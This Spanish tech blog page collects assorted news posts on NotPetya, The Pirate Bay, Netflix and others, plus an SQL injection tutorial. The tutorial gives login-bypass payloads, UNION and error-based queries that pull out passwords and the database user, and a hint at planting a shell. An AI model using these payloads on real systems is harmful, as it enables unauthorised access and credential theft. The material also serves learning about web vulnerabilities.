Publicado el

Evita el NotPetya la nueva plaga de Ransomware con este siempre comando

En los últimos dias se ah propagado una nueva amenaza que llego para ocupar el lugar  del Ransomware que trajo al mundo de cabeza  los pasados meses.

Evita el mas rato y tener la perder tu información ejecutando este comando, este es una vacuna para evitar que el Ransomware cambien de exención los ficheros de tu equipo.

Funciona en todas las versiones de windows, y recuerden siempre actualizar sus parches de seguridad, ya que en estos últimos días windows sacara su parche de seguridad para evitar este fallo.

En la consola:
CD %Systemroot%
echo.x>>perfc
attrib +r perfc

Eso es todo 

Comenten si les funciono,  y cuidado con lo que abren en internet.

En los últimos días estaremos subiendo mas contenido a la web.

Publicado el

The Pirate Bay Comienza con el Streaming de Películas

A pesar de que numerosos servicios similares ya han tenido un fatal destino como, recientemente fue el caso de la famosa aplicación de streaming Popcorn Time, eso no ha asustado a la gente de la “Bahía” de torrents más famosa del mundo.

Así es, por si no les bastara con ser una de las páginas de piratería más amadas por los usuarios, pero más odiadas por todas las empresas de contenido multimedia, The Pirate Bay pretende ir un paso más allá al ofrecer ahora una nueva modalidad de streaming.

ejemplo

La gente de The Pirate Bay aclara que esta nueva modalidad se encuentra todavía en fase de prueba, algo que queda en evidencia a la hora de probarlo, debido a que algunos contenidos no se llegan a reproducir correctamente o quedan pausados.

Sobre el plugin de TorrentsTime, éste, al igual que otros servicios, ofrece la inclusión automática de subtítulos, así como soporte para Chromecast, Airplay y DLNA. También hacen la advertencia/recomendación de emplear un servicio de VPN para protoger nuestra privacidad.

eje2

Sin duda una acción interesante por parte de este servicio ilegal, del cual suponemos que en poco tiempo funcionará plenamente y gracias a su extenso historial de cierres y reaperturas no dudamos que al igual que otras páginas de este tipo dure muchos años.

Fuente:unocero.com

Publicado el

PlayStation Messages: la nueva aplicación de mensajería para gamers

Sony separa sus aplicaciones móviles en dos partes: PlayStation Messages será exclusiva para conversaciones, y elimina los chats de la app compañera de PS4.

PS4Logo

Sony lanzó hoy una nueva aplicación independiente de mensajería para manejar tus conversaciones de PSN. La app compañera para iOS y Android recibió hoy una actualización que requiere instalar PlayStation Messages en nuestros dispositivos para poder seguir disfrutando de las funciones de chat con nuestros amigos de PS4 en el móvil.

La nueva aplicación es mucho más rápida que la de PlayStation, quien la ha usado sabe que se hace viejo esperando tan solo a que abra. Además soporta grupos, tiene stickers de muchos videojuegos, y te permite descargar las imágenes que compartes o te envían desde un PS4 a tu móvil.

playstation-messages

 

Publicado el

iOS 9 VS Android 6, Con Cual te quedas?

ios-9-vs-android-6-comparativa-interfaz-usuario

iOS 9 vs. Android 6.0 Marshmallow Apple y Google son las dos empresas con más usuarios en sus sistemas operativos para móviles. Millones de personas alrededor del mundo eligen entre una y otra alternativa, defendiendo los iPhone o los móviles Android de diferentes fabricantes. Cada año hay una nueva batalla a medida que salen actualizaciones y nuevas versiones de los sistemas operativos, y con iOS 9 no iba a ser distinto. Desde TodoiPhone.net hemos decidido hacer una comparación entre las más recientes versiones de ambas plataformas. iOS 9 por el lado de Apple, y Android 6.0 Marshmallow por parte de la gente de Google.

ios-9-vs-android-6-0-marshmallow-home-screen (1)

Disponibilidad

De momento iOS 9 está disponible en los nuevos iPhone 6s y iPhone 6s Plus, así como en dispositivos más viejos desde el iPhone 4s hasta el iPad 2. En cambio, el sistema operativo Android 6.0 Marshmallow únicamente corre en los nuevos teléfonos móviles Google Nexus 4X y 6P, y en algunas unidades de la generación anterior. Tanto uno como otro tienen sus ventajas y desventajas, desde lo estético hasta lo práctico y funcional. Pero también hay que remarcar que ninguna de las dos actualizaciones representa un gran cambio a nivel estético. El diseño de ambos sistemas operativos parece estar más apuntado a conseguir un mejor rendimiento y funciones que trabajan en segundo plano para mejorar la experiencia del usuario. Distintos sitios web han realizado pruebas y encuestas para ver qué opinión tienen los usuarios acerca de los sistemas operativos, y de acuerdo a la votación llevada a cabo por la gente de PhoneArena.com, el ganador indiscutido es Android 6.0 Marshmallow. Te mostramos un poco, en imágenes y video, lo que sucede con al comparar los puntos más importantes en materia estética y de diseño de iOS 9 y Android 6.0.

ios-9-vs-android-6-0-marshmallow-lock-screen-347x309ios-9-vs-android-6-0-marshmallow-siri-google-now-search-347x307 ios-9-vs-android-6-0-marshmallow-settings-235x208 ios-9-vs-android-6-0-marshmallow-control-center-235x208

Los usuarios prefieren Android

Al menos eso se desprende de la encuesta de PhoneArena. El nuevo sistema operativo para móviles y tablets de Google consiguió 13,793 votos contra los 7,785 que acumuló iOS 9, la más reciente iteración de la plataforma móvil de Apple. Las respuestas detrás de esta diferencia pueden encontrarse principalmente en los grandes errores que tuvo iOS 9 con los dispositivos más antiguos. Al consumidor no le gustó tener tantas actualizaciones pequeñas en menos de 2 semanas (iOS 9.0.1 – iOS 9.0.2 y luego la versión final de iOS 9.1), y la respuesta fue un voto mucho más masivo hacia la iniciativa de Google con Android 6.0 Marshmallow, un sistema que, como se puede ver en las comparaciones, tiene un estilo minimalista bastante similar.

 

Publicado el

Strml – Una web que se construye sola

Si estas aprendiendo a programar páginas web, a entender mejor lo que se puede hacer con CSS y a jugar con HTML5, echad un vistazo en strml.net.

Se trata de un proyecto creado por Samuel Reeds, programador que decidió crear una web que se construye a media que leemos, ya que el texto, en inglés, va indicando las alteraciones que la propia web va sufriendo.

Nada más entrar veremos un texto negro con fondo blanco, texto que empieza a aparecer queriendo “más cambios”. A medida que el tiempo pasa, la propia web indica los cambios sufridos: columnas, colores, efectos… ayudando así a entender cómo afecta el código al resultado final.

La animación puede pararse en cualquier momento, siendo así un excelente recurso para comentarlo en clase, ayudando a entender mejor la estructura de una web moderna.

strml

 

Como ves en la imagen, el resultado final no es impresionante, pero sí muy didáctico. En este caso está claro que lo que importa es el camino recorrido, y la original forma de mostrarlo.

Publicado el

PornHub Regala Computadora a Usuario

Una web porno regala un portátil a un usuario que rompió el suyo al ser descubierto  su madre

qr25D

Denzel, un joven inglés, tuvo que romper su ordenador portatil mientras veía porno para que su madre no le pillara. Desolado por ello, optó por desahogarse publicando su historia en Twitter. Mencionó a la página web que estaba viendo cuando ocurrió todo y, lejos de lavarse las manos, la empresa optó por ayudarle.

d1Kzr

Pornhub, una de las web de porno más potentes a nivel mundial, quiso consolar a su fan. No solo respondieron a Denzel a través de Twitter, sino que fueron un paso más allá y le mandaron un nuevo portatil por ser «un fan tan leal».

Según el diario británico The Mirror, el propio vicepresidente de la página web, Corey Price, se ha preocupado mucho por lo sucedido y ha mandado ánimos al joven. «Queremos obsequiarle con un ordenador nuevo y un pack de Pornhub para su placer continuo», aseguró Price.

 

LR6o

El joven inglés se ha ganado una fama a nivel mundial por su portátil roto. Con dos nuevos tuits ha mostrado a todo el mundo el obsequio de Pornhub y les ha dado las gracias.

6vx8d

 

Publicado el

Tutorial SQL Injection ¿Como se Hace?

La inyección SQL es el ataque vía web, que aprovecha errores en la filtración de datos introducidos por el usuario, y que permiten a un atacante, tener control de cierta aplicación.

Atención

Es recomendable tener un poco de conocimiento en PHP para  el mejor entendimiento de los  Códigos.

Los ataques SQL pueden ser evitados de muchas formas, iniciare con algunos ejemplos de instrucciones vulnerables, con las “magic quotes” desactivadas.

Ejemplo 1

Código:
$us=$_POST[‘usuario’];
$pass=$_POST[‘pass’];
$sql=»SELECT * FROM usuarios WHERE user = ‘$us’ AND password=’$pass'»;
Código:
if(mysql_fetch_array($exc)){
echo «Inicio de sesión correcto»; // Esto fue modificado
}
Este es el tipico sistema de verificación de contraseñas. Utiliza la instruccion mysql_fetch_array(funcion de mysql, que devuelve falso si no hay ningún resultado, en la ‘querry’, o petición), asi que si no hay ningún resultado donde el usuario y el password conuerden, el resultado es false.

como podemos hacer que no devuelva false??

  • Con el password correcto
  • Haciendo trampa

En este caso como no conocemos el password correcto  usaremos la segunda opción:

Haciendo trampa.. se haría algo así:

esta es la petición que solo nos deja pasar si sabemos el password:
Código
SELECT * FROM usuarios WHERE user = '$us' AND password='$pass'ahora, ¿como se puede hacer que nos devuelva true aunque no sepamos el password, sabiendo que solo podemos modificar $pass y $us?
Supongamos que ponemos de usuario betito, y de password pass1234.
El usuario existe, pero no sabemos el pass..
la sentencia que SQL recibirá seria :

Código:
SELECT * FROM usuarios WHERE user = 'betito' AND password='pass1234'
Como no hay ningun campo donde el usuario y el password coincidan, nos devolvera false.
Ahora, con un poco de creatividad:
de usuario:   betito
de password: ‘ OR »=’la sentencia SQL recibira:

SELECT * FROM usuarios WHERE user = 'betito' AND password='' OR ''=''

nos devolvera true, si hay algun resultado y como NADA siempre es igual a NADA, nos devolvera true, y pasamos el mecanismo de validación como el usuario betito.

Otros posibles valores que devuelven true son:

  • usuario: betito AND /*   password: */ »=’
  • usuario: ‘ OR 1=1 //

Ahora… que si quisieras saber el password.. (te advierto, que normalmente esta cifrado, y deberas desencriptarlo, con alguna herramienta para eso como john the ripper), tomemos el siguiente ejemplo.

Ejemplo 2
Código:
$us=$_POST[‘usuario’];
$pas=$_POST[‘pass’];
if($_GET[‘usuario’] || $_GET[‘pass’]){
die(«Hack Attempt»);
}
$sql=»SELECT password FROM usuarios WHERE user = ‘$us'»;
Código:
$resp = mysql_query($sql) or die(mysql_error());
if(mysql_fetch_array($resp)){
if($resp==$pas){
echo «Inicio de sesión exitoso»; // Esto fue modificado
}else{
echo «el password $resp es incorrecto»;
}
}
 Bien, este ejemplo, que se ve mucho mas seguro  y surge la pregunta , ¿es vulnerable?
SI, ¿porque?
Ya quedamos en que no hay magic quotes, las magic quotes son una función que trata de desactivar todas las cadenas introducidas por el usuario, que parezcan peligrosas, como comillas, diagonales, \0 etc..
el webmaster pensó, que como no usaba el mysql_fetch_array, entonces no podian usar un ‘ OR »=’, como la inyección clasica, pasada.Ahora, queremos sacar el password.. pero.. ¿como?

Hay una instruccion en SQL llamada UNION, que sirve para obtener información de 2 tablas, o..
Bueno.. UNION necesita algunos requisitos.

  • Necesitas meter la misma cantidad de valores que tiene la tabla.
  • Tener un informe de los errores que provocaremos en la instrucción

Bien ahora empezemos.
la instrucción a modificar es la siguiente:

Còdigo:
SELECT password FROM usuarios WHERE user = '$us'como ejemplo, si colocamos de usuario: maestro
la instrucción que llega seria:

 

Código:
SELECT password FROM usuarios WHERE user = 'maestro'

regresemos al UNION.

UNION necesita que el numero de columnas sea igual, sino sacara un error.

y exactamente, lo que necesitamos es un error, que nos diga cuando estamos mal, para saber cuando estamos bien.

el UNION se usa de esta forma:

usuario: ‘ AND 0 UNION SELECT 1 AND ‘l’=’
SELECT password FROM usuarios WHERE user = '' AND 0 UNION SELECT 1 AND 'l'=''

para lo cual SQL nos respondera:

Código Regreso:
The used SELECT statements have a different number of columns:SELECT password FROM usuarios WHERE user = » AND 0 UNION SELECT 1 AND ‘l’=»

Continuando por el mismo camino, podemos hacer que nos regrese un error, al tratar de UNIR un campo de tipo INT (osea que guarda numeros) a un CHAR (guarda letras)

Quedaria algo así:

‘ UNION SELECT MIN(Password),2,3,4,5 FROM usuarios WHERE user = ‘maestro’

la sentencia seria esta:

SELECT password FROM usuarios WHERE user = '' UNION SELECT MIN(Password),2,3,4,5 FROM usuarios WHERE user = 'maestro'

que nos da como error:

Codigo
Syntax error converting the varchar value ‘12345’ to a column of data type int.

donde el password es 12345

Las inyecciones ultimamente han logrado tener mas poder que antes,  debemos sacar toda la información posible, y con un poco de esfuerzo, conseguimos tener control de archivos (crear, borrar, etc..).el siguiente es un ejemplo, con la misma sentencia usuario:

Código:

‘ AND 0 UNION SELECT 1,user(),3,4,5 AND ‘l’=’

y nos regresa:

Código Respuesta:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation ‘UNION’

que significa esto? que estamos metiendo valores en utf cuando debe ser en latin1.. eso lo arreglamos asi:

‘ AND 0 UNION SELECT 1,convert(user() using latin1),3,4,5 AND »l=’

y eso nos regresa:

Código Shell:
root@localhost
esto, no es todo, con hacer que regrese valores con ‘<??>’, podemos incluso crearnos nuestra shell.
Bueno amigos esto fue todo el tutorial esperando sus comentarios .
Nos vemos en el siguiente Tutorial.
Publicado el

Netflix Bloqueara el Uso de VPN y Proxys.

netflix-television

Los servicios de streaming como Netflix son siempre más variados en Estados Unidos, por ello, muchos de nosotros utilizamos un pequeño truco con el cual podemos ingresar al catálogo de ese país, pues bien, parece ser que la compañía lo ha hecho de nuevo (la primera fue su cambio de costos) y aparentemente ha comenzado a bloquear proxys o VPN.

Con los proxys y VPN podíamos hacer pensar a nuestra computadora que estábamos en otra parte del mundo, pues a Netflix no le ha gustado nada y lo ha comenzado a bloquear, por ejemplo, en la aplicación de Android solamente puede acceder con un proxy de Google, lo cual inhabilita cualquier modificación.

descargaPor otro lado, usuarios de TorGuard han informado a TorrentFreak que varios de ellos han sido bloqueados al usar uno de esos trucos, pero que ciertamente se trata de casos aislado como para mencionar de una redada o implementación masiva.

 

Lo que sabemos por ahora es que posiblemente Netflix utiliza el navegador de tu computadora o el GPS de tu smartphone o tablet para establecer el huso horario que tienes y así verificar el lugar de donde estás visualizando el contenido, esperemos que pronto se anuncie por lo menos que se está bloqueando o sino, que simplemente dejen las cosas como están.

Publicado el

Hive la nueva alternativa para almacenar sin limites en la Nube

Hive permite subir diversos tipos de archivos sin cobrar, convirtiéndose en rival para servicios como Dropbox y Box. Tiene además funciones de red social, se puede escuchar música y ofrece acceso a cuentas premium a quienes tengan más de 100 amigos.

0011678317 0011678324Tras un breve período de pruebas limitadas, Hive abrió finalmente su servicio a los usuarios para que suban diversos tipos de archivos, sin límites de almacenamiento ni costos. 

Hive solo cobra por pocas funciones premium, como la visualización de videos en HD y la desaparición de anuncios publicitarios. Después, dicen sus creadores, el usuario podrá subir videos de incluso 4 TB.

A diferencia de Dropbox, Box, Google Drive y SkyDrive, entre otros, Hive suma funciones sociales: se pueden agregar amigos y ver, si así lo deciden, sus fotos, videos u otros archivos. Incluso, como cuenta con un reproductor multimedia, los usuarios son capaces de escuchar la música que otros almacenan.

0011678310Hive aún está en etapa de pruebas, por lo que su servicio puede mostrarse inestable. A cambio, sus creadores proponen acceso a funciones premium sin costo. 
Cuando la beta finalice, el costo del servicio premium será de u$s9 mensuales si el usuario tiene menos de 10 amigos; de u$s6 en caso de tener más de 10; ascenderá a u$s3 para aquellos con más de 50; y será gratuito para quienes superen los 100 contactos.

Hive es ofrecido por la firma QVIVO, basada en Hong Kong y dedicada a ofrecer almacenamiento en la nube. En una entrevista con TorrentFreak, los creadores explicaron que un servicio se diferencia del otro por su parte social.

Publicado el

Así es como Funciona The Pirate Bay por dentro

black_and_white_the_pirate_bay_flags_1366x768_28278

En 2006, la policía irrumpía en el proveedor de alojamiento del popular tracker de BitTorrent The Pirate Bay y confiscaba todos los servidores. Pese a todo la página siguió funcionando y, con vistas a evitar una situación similar en el futuro, en 2012 los responsables de la misma aseguraron que TPB ya no tendría servidores que requisar: su lugar estaría, desde entonces, en la nube.

Ahora, dos años después, desde Torrent Freak publican más detalles sobre la estructura interna que utiliza el tracker. Sabemos, por ejemplo, que en la actualidad el sitio funciona sobre 21 máquinas virtuales contratados por todo el mundo y no tienen hardware propio (específicamente servidores). En total todas ellas suman 182 GB de RAM, 94 CPU y 620 GB de espacio, aunque dicen no utilizarlo al completo.

¿Para qué se utilizan estas máquinas virtuales? No todas están destinadas a la misma tarea, como vemos a continuación y además la distribución no es fija. Por ejemplo, y debido al crecimiento reciente de actividad, han tenido que añadir cuatro nuevas máquinas en los dos últimos años. La distribución actual sería la siguiente:

 

  • 8 sirven la página web
  • 6 para búsquedas
  • 2 para la base de datos
  • 1 para torrents
  • 1 para estadísticas
  • 1 para el proxy
  • 1 para balancear la carga
  • 1 para control

Como pasan desapercibido

 

Tal y como explicábamos ya en 2012, la idea de utilizar esta configuración es conseguir hacer más difícil el acceso a las autoridades. Ya no hay una sala de servidores en la que irrumpir, como en 2006, sino que son máquinas dispersas por todo el mundo. Todo el trabajo de éstas pasa por el balanceador de carga, por lo que es imposible saber cuál es el origen del tráfico que se recibe (en otras palabras, el tráfico entre balanceador y máquina virtual va cifrado y de cara al resto del mundo el origen es el propio balanceador).

Lo más curioso de todo es que, por lo que acabamos de explicar, las máquinas virtuales proceden deservicios comerciales de alojamiento en la nube que ni siquiera saben que The Pirate Bay está entre sus clientes. ¿Y si se pierde una máquina virtual? Todo está preparado para tener otra funcionando casi de forma instantánea, por lo que de cara al usuario final no se interrumpiría el servicio. Siendo todavía más «apocalípticos», y en el improbable caso de que las autoridades consiguieran entrar el sistema actual, bastaría con desconectar las máquinas virtuales, mudar su contenido a otro proveedor y apuntar hacia él el balanceador de carga.

¿Significa todo esto que The Pirate Bay está listo para resistir cualquier movimiento de las autoridades? Sí y no. De momento, y con esta configuración de su tracker, han conseguido sobrevivir. Sin embargo, dentro de la cadena hay algunos servicios más frágiles, como los dominios (no será la primera vez que les suspenden alguno). Eso sí, en el caso de que vuelvan a perder su dirección, tienen preparadas decenas de ellas para actuar como alternativas. Con todo esto, no se pueden decir que los chicos de TPB no estén preparados para la que les pueda caer.